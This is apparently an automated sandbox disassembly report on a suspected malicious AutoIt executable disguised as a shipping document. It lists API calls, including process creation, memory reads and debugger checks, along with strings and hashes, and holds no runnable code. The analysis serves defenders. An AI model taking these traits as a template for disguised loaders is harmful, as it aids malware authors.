                                                                                                                              • Opcode ID: 1cf3952d6ef6f8121dc2fb83ddb100cad10fe2b5dd0f947c838fb8c3913eac4c
                                                                                                                              • Instruction ID: 1870493211b87a2deb42bd6ec0bd4c9bbab2cdacf86f7728d5c355894a606240
                                                                                                                              • Opcode Fuzzy Hash: 1cf3952d6ef6f8121dc2fb83ddb100cad10fe2b5dd0f947c838fb8c3913eac4c
                                                                                                                              • Instruction Fuzzy Hash: 55519330E04288EAEF11DBB4C854BEEBB75AF19304F104198E648BB2C1D7B91B44CB65

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1001 9b69ca-9b69f1 call 9b4f3d 1004 9ee38a-9ee39a call a19604 1001->1004 1005 9b69f7-9b6a05 call 9b4f3d 1001->1005 1009 9ee39f-9ee3a1 1004->1009 1005->1004 1010 9b6a0b-9b6a11 1005->1010 1011 9ee3a3-9ee3a6 call 9b4faa 1009->1011 1012 9ee3c0-9ee408 call 9d0f36 1009->1012 1014 9ee3ab-9ee3ba call a14339 1010->1014 1015 9b6a17-9b6a39 call 9b6bec 1010->1015 1011->1014 1020 9ee42d 1012->1020 1021 9ee40a-9ee414 1012->1021 1014->1012 1025 9ee42f-9ee442 1020->1025 1024 9ee428-9ee429 1021->1024 1026 9ee42b 1024->1026 1027 9ee416-9ee425 1024->1027 1028 9ee448 1025->1028 1029 9ee5b9-9ee5bc call 9d2ed5 1025->1029 1026->1025 1027->1024 1031 9ee44f-9ee452 call 9b75e0 1028->1031 1032 9ee5c1-9ee5ca call 9b4faa 1029->1032 1035 9ee457-9ee479 call 9b5f12 call a17492 1031->1035 1038 9ee5cc-9ee5dc call 9b7776 call 9b5efb 1032->1038 1044 9ee48d-9ee497 call a1747c 1035->1044 1045 9ee47b-9ee488 1035->1045 1052 9ee5e1-9ee611 call a0fad2 call 9d0fac call 9d2ed5 call 9b4faa 1038->1052 1054 9ee499-9ee4ac 1044->1054 1055 9ee4b1-9ee4bb call a17466 1044->1055 1047 9ee580-9ee590 call 9b766f 1045->1047 1047->1035 1057 9ee596-9ee5b3 call 9b74bd 1047->1057 1052->1038 1054->1047 1064 9ee4cf-9ee4d9 call 9b5f8a 1055->1064 1065 9ee4bd-9ee4ca 1055->1065 1057->1029 1057->1031 1064->1047 1071 9ee4df-9ee4f7 call a0fa6e 1064->1071 1065->1047 1076 9ee51a-9ee51d 1071->1076 1077 9ee4f9-9ee518 call 9b7f41 call 9b5a64 1071->1077 1079 9ee51f-9ee53a call 9b7f41 call 9b6999 call 9b5a64 1076->1079 1080 9ee54b-9ee54e 1076->1080 1100 9ee53b-9ee549 call 9b5f12 1077->1100 1079->1100 1082 9ee56e-9ee571 call a17428 1080->1082 1083 9ee550-9ee559 call a0f98f 1080->1083 1090 9ee576-9ee57f call 9d0fac 1082->1090 1083->1052 1093 9ee55f-9ee569 call 9d0fac 1083->1093 1090->1047 1093->1035 1100->1090
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 009B4F6F
                                                                                                                              • _free.LIBCMT ref: 009EE5BC
                                                                                                                              • _free.LIBCMT ref: 009EE603
                                                                                                                                • Part of subcall function 009B6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 009B6D0D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                              • API String ID: 2861923089-1757145024
                                                                                                                              • Opcode ID: f154dc4927b3e15724ae51a1b129aa032b452c835747b1e5092c98fadbc5c32f
                                                                                                                              • Instruction ID: e85d18c041e1a87965c980eab2f5aa90c03da4d2b7fc41b1ce2e617a992c4dbd
                                                                                                                              • Opcode Fuzzy Hash: f154dc4927b3e15724ae51a1b129aa032b452c835747b1e5092c98fadbc5c32f
                                                                                                                              • Instruction Fuzzy Hash: E1919071910259AFCF15EFA5CD91AEDB7B8FF48314F14442AF815AB2A1EB34AD04CB60

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1105 9b35b0-9b35bb 1106 9b362f-9b3631 1105->1106 1107 9b35bd-9b35c2 1105->1107 1109 9b3620-9b3625 1106->1109 1107->1106 1108 9b35c4-9b35dc RegOpenKeyExW 1107->1108 1108->1106 1110 9b35de-9b35fd RegQueryValueExW 1108->1110 1111 9b35ff-9b360a 1110->1111 1112 9b3614-9b361f RegCloseKey 1110->1112 1113 9b360c-9b360e 1111->1113 1114 9b3626-9b362d 1111->1114 1112->1109 1115 9b3612 1113->1115 1114->1115 1115->1112
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.KERNEL32 ref: 009B35D4
                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 009B35F5
                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 009B3617
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID: Control Panel\Mouse
                                                                                                                              • API String ID: 3677997916-824357125
                                                                                                                              • Opcode ID: 3bc4b829df17d2285b8fee79aa5ea7c19f188e9821cdcd7d6da9d89f3e9a7a4f
                                                                                                                              • Instruction ID: 5dab5b78789a16fd28bc43e721078a37f920cd7d0c8559713aa38644fea5c82f
                                                                                                                              • Opcode Fuzzy Hash: 3bc4b829df17d2285b8fee79aa5ea7c19f188e9821cdcd7d6da9d89f3e9a7a4f
                                                                                                                              • Instruction Fuzzy Hash: 531148B5910208FFDB20CFA9DD81AEEB7BCEF05750F009469F805D7210E2719E419B60

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1116 a19604-a19687 call 9b5045 call a197dd 1121 a19691-a19748 call 9b506b * 4 call 9b5045 call 9d588c * 2 call 9b506b call a191b2 call a189fc 1116->1121 1122 a19689 1116->1122 1145 a1974a-a1975a call 9d2ed5 * 2 1121->1145 1146 a1975f-a19763 1121->1146 1123 a1968b-a1968c 1122->1123 1125 a197d4-a197da 1123->1125 1145->1123 1148 a19765-a197bd call a18baf call 9d2ed5 1146->1148 1149 a197c4-a197ca call 9d2ed5 1146->1149 1159 a197c2 1148->1159 1156 a197cc-a197d2 1149->1156 1156->1125 1159->1156
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B5045: _fseek.LIBCMT ref: 009B505D
                                                                                                                                • Part of subcall function 00A197DD: _wcscmp.LIBCMT ref: 00A198CD
                                                                                                                                • Part of subcall function 00A197DD: _wcscmp.LIBCMT ref: 00A198E0
                                                                                                                              • _free.LIBCMT ref: 00A1974B
                                                                                                                              • _free.LIBCMT ref: 00A19752
                                                                                                                              • _free.LIBCMT ref: 00A197BD
                                                                                                                                • Part of subcall function 009D2ED5: HeapFree.KERNEL32(00000000,00000000), ref: 009D2EE9
                                                                                                                                • Part of subcall function 009D2ED5: GetLastError.KERNEL32(00000000,?,009D9BA4), ref: 009D2EFB
                                                                                                                              • _free.LIBCMT ref: 00A197C5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1552873950-0
                                                                                                                              • Opcode ID: 06f46c1fceb8d5b17a5c3841cb1f24f72943730a4dd95fd49ea67a1a9e5beba0
                                                                                                                              • Instruction ID: 800880c7744d098bd362503edb5c29fe4f39a988df8f909a9bac215649046a8c
                                                                                                                              • Opcode Fuzzy Hash: 06f46c1fceb8d5b17a5c3841cb1f24f72943730a4dd95fd49ea67a1a9e5beba0
                                                                                                                              • Instruction Fuzzy Hash: 01512EB1904258AFDF249F64DC85BDEBBB9EF88310F10449EB609A7341DB715A90CF58
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 009EED92
                                                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 009EEDDC
                                                                                                                                • Part of subcall function 009B48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009B48A1,?,?,009B37C0,?), ref: 009B48CE
                                                                                                                                • Part of subcall function 009D0911: GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,009B741D,00000001,00A76290,?,009B3BCD,00A752F8,00A752E0,?,?), ref: 009D0930
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                              • String ID: X
                                                                                                                              • API String ID: 3777226403-3081909835
                                                                                                                              • Opcode ID: 955b4688c3492f07070cf74a13947d532afab7c30ea78a07205ea6b0f518e6fd
                                                                                                                              • Instruction ID: f1faf25da53c901a6ff02b5ca55bd3d12a3388da0dd66e13bf93dae228e6bc0a
                                                                                                                              • Opcode Fuzzy Hash: 955b4688c3492f07070cf74a13947d532afab7c30ea78a07205ea6b0f518e6fd
                                                                                                                              • Instruction Fuzzy Hash: EC21C670A042889BCB05DFD4CC45BEEBBFD9F89714F00801AE408A7281DBF859898BA1
                                                                                                                              APIs
                                                                                                                              • CreateProcessW.KERNEL32(?,00000000), ref: 00EA1443
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EA14FB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348490692.0000000000E9F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9F000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e9f000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CreateMemoryRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2726527582-0
                                                                                                                              • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                                                                              • Instruction ID: 5abf39e494d71f855fac79161bfbd6161b05a8356e65ef0b297a19260f1faadc
                                                                                                                              • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                                                                              • Instruction Fuzzy Hash: ED62FD30A142589BEB24CFA4C851BDEB376EF59304F1091A9E10DFB390E7799E81CB59
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a7fb56cfddc0c17dfef4375b74e566df7cdfe036ecf45c0b1459cf8557959062
                                                                                                                              • Instruction ID: eccefbb637869c4b5e6eb9e40e0ce3ce1c97bd74a5b6c41d057f492d3ddabcf4
                                                                                                                              • Opcode Fuzzy Hash: a7fb56cfddc0c17dfef4375b74e566df7cdfe036ecf45c0b1459cf8557959062
                                                                                                                              • Instruction Fuzzy Hash: 6EF136706083119FC714DF28D584A6ABBE5FF88324F14892EF89A9B352D731E945CF82
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009D02E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009D0313
                                                                                                                                • Part of subcall function 009D02E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 009D031B
                                                                                                                                • Part of subcall function 009D02E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009D0326
                                                                                                                                • Part of subcall function 009D02E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009D0331
                                                                                                                                • Part of subcall function 009D02E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 009D0339
                                                                                                                                • Part of subcall function 009D02E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 009D0341
                                                                                                                                • Part of subcall function 009C6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,009BFA90), ref: 009C62B4
                                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009BFB2D
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 009BFBAA
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 009F4921
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1986988660-0
                                                                                                                              • Opcode ID: a89c5daa97a55e13388fdd133cab46f317c1cb2fd20346934a7f8c8c3251f28e
                                                                                                                              • Instruction ID: 57af73988b1dc226d238f9a446987a5f860fbe54534fb52e4766f6a8c86216bd
                                                                                                                              • Opcode Fuzzy Hash: a89c5daa97a55e13388fdd133cab46f317c1cb2fd20346934a7f8c8c3251f28e
                                                                                                                              • Instruction Fuzzy Hash: 8081A9B0D11A408FD398DFB9AD55659BBE6EB88316B50C92A901DCB271EBF044C68F11
                                                                                                                              APIs
                                                                                                                              • __FF_MSGBANNER.LIBCMT ref: 009D58A3
                                                                                                                                • Part of subcall function 009DA2EB: __NMSG_WRITE.LIBCMT ref: 009DA312
                                                                                                                                • Part of subcall function 009DA2EB: __NMSG_WRITE.LIBCMT ref: 009DA31C
                                                                                                                              • __NMSG_WRITE.LIBCMT ref: 009D58AA
                                                                                                                                • Part of subcall function 009DA348: GetModuleFileNameW.KERNEL32(00000000,00A733BA,00000104,?,00000001,00000000), ref: 009DA3DA
                                                                                                                                • Part of subcall function 009DA348: ___crtMessageBoxW.LIBCMT ref: 009DA488
                                                                                                                                • Part of subcall function 009D321F: ___crtCorExitProcess.LIBCMT ref: 009D3225
                                                                                                                                • Part of subcall function 009D321F: ExitProcess.KERNEL32 ref: 009D322E
                                                                                                                                • Part of subcall function 009D8CA8: __getptd_noexit.LIBCMT ref: 009D8CA8
                                                                                                                              • RtlAllocateHeap.NTDLL(00B30000,00000000,00000001,00000000,?,?,?,009D0F53,?), ref: 009D58CF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1372826849-0
                                                                                                                              • Opcode ID: 2d1fae902037357c5882ddda78da20a294ffd92609e5a99922738489eccb209b
                                                                                                                              • Instruction ID: abc7385f73b0ee4b1fd729414837ea9208055646255c1867ccc8a3e9143c38f2
                                                                                                                              • Opcode Fuzzy Hash: 2d1fae902037357c5882ddda78da20a294ffd92609e5a99922738489eccb209b
                                                                                                                              • Instruction Fuzzy Hash: 940145322D0B11EBDA1027B5AC12B2E734CDFC1361F42C427F505AB392DE708E415761
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CALL
                                                                                                                              • API String ID: 0-4196123274
                                                                                                                              • Opcode ID: 8ef7e40486bcb4d9ff897e7b01266c632e17e42fad796961c0c977d6c7e6fadb
                                                                                                                              • Instruction ID: c95f9f073a0a816db3a1ac7c77347560981e80dbf0bad27932141104a9d71a2b
                                                                                                                              • Opcode Fuzzy Hash: 8ef7e40486bcb4d9ff897e7b01266c632e17e42fad796961c0c977d6c7e6fadb
                                                                                                                              • Instruction Fuzzy Hash: 47225970508201DFCB24DF14C594BAABBE5FF84324F14896DE89A9B3A2D775EC45CB82
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID: EA06
                                                                                                                              • API String ID: 4104443479-3962188686
                                                                                                                              • Opcode ID: ac0a3e722f7c2c6396538fa57fbc2c14235be16e33be47c379289c1559954778
                                                                                                                              • Instruction ID: 19e0265de063ecb09fbe47962a34c6ab33bee4d7df998eb85081ccf21def930a
                                                                                                                              • Opcode Fuzzy Hash: ac0a3e722f7c2c6396538fa57fbc2c14235be16e33be47c379289c1559954778
                                                                                                                              • Instruction Fuzzy Hash: 3B41AD21A041586BCF219F648A517FE7BB6AF85320F684475FC869B283C624DD40A7E2
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4104443479-0
                                                                                                                              • Opcode ID: bbc4a7f74bc54e3f61f0c3cacf56e2a493c180291a00b00fe7cbd9f124d91e7b
                                                                                                                              • Instruction ID: 4a99d980f15c2910222d45a8b11247c9cb9c4b31258712590c0f015231426f69
                                                                                                                              • Opcode Fuzzy Hash: bbc4a7f74bc54e3f61f0c3cacf56e2a493c180291a00b00fe7cbd9f124d91e7b
                                                                                                                              • Instruction Fuzzy Hash: A64114715082199FC720EFA8D981BFEB7B8EF89310F24845AF18597342DB309C85CB60
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4104443479-0
                                                                                                                              • Opcode ID: 5a18ef088ec6c4a9ff86e6726e36c9b5857e7d63fba37b41e753ccdf73a04c2d
                                                                                                                              • Instruction ID: 6fbe704e19098dd6076de6c4f9946b0da014630074b2365c557699b04a177eb7
                                                                                                                              • Opcode Fuzzy Hash: 5a18ef088ec6c4a9ff86e6726e36c9b5857e7d63fba37b41e753ccdf73a04c2d
                                                                                                                              • Instruction Fuzzy Hash: F23193B1604506AFC714DFA8D9D1EA9F7A9FF88320B15872EE515CB391DB70E850CB90
                                                                                                                              APIs
                                                                                                                              • IsThemeActive.UXTHEME ref: 009B4992
                                                                                                                                • Part of subcall function 009D34EC: __lock.LIBCMT ref: 009D34F2
                                                                                                                                • Part of subcall function 009D34EC: DecodePointer.KERNEL32(00000001,?,009B49A7,00A07F9C), ref: 009D34FE
                                                                                                                                • Part of subcall function 009D34EC: EncodePointer.KERNEL32(?,?,009B49A7,00A07F9C), ref: 009D3509
                                                                                                                                • Part of subcall function 009B4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000,00000000,?,00B5A1C0,?,009B49BA), ref: 009B4A73
                                                                                                                                • Part of subcall function 009B4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,00B5A1C0,?,009B49BA), ref: 009B4A88
                                                                                                                                • Part of subcall function 009B3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009B3B7A
                                                                                                                                • Part of subcall function 009B3B4C: IsDebuggerPresent.KERNEL32 ref: 009B3B8C
                                                                                                                                • Part of subcall function 009B3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A752F8,00A752E0,?,?), ref: 009B3BFD
                                                                                                                                • Part of subcall function 009B3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 009B3C81
                                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 009B49D2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1438897964-0
